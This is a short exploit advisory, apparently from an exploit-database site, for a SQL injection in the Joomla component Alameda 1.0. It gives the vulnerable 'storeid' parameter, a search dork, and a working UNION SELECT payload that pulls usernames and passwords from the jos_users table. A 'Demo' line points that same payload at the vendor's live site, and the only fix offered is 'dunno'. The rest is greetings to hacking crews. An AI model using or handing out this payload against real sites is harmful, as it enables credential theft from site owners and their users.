Joomla Alameda 1.0 SQL Injection

`[~] Joomla Component Alameda (com_alameda) SQL Injection Vulnerability   
[~] Author : kaMtiEz ([email protected])   
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id   
[~] Date : 1 Nov , 2011   
  
[ Software Information ]  
  
[+] Vendor : http://www.blueflyingfish.com/alameda/  
[+] INFO : http://extensions.joomla.org/extensions/e-commerce/e-commerce-bridges/18018  
[+] Download : http://www.blueflyingfish.com/alameda/index.php?option=com_content&view=article&id=3  
[+] version : 1.0   
[+] Vulnerability : SQL INJECTION  
[+] Dork : "CiHuY"  
[+] LOCATION : - INDONESIA -  
  
  
[ Vulnerable File ]  
  
http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=1[SQL]  
  
[ XpL ]  
  
http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--  
  
[ Demo ]  
  
http://www.blueflyingfish.com/alameda/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--  
  
[ FIX ]  
  
dunno :">  
  
[ Thx TO ]  
  
[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9  
[+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0  
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr. Cruzz  
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D  
  
[ NOTE ]  
  
[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)  
[+] be yourself ;)  
  
[ QUOTE ]  
  
[+] INDONESIANCODER still r0x  
[+] nothing secure ..  
`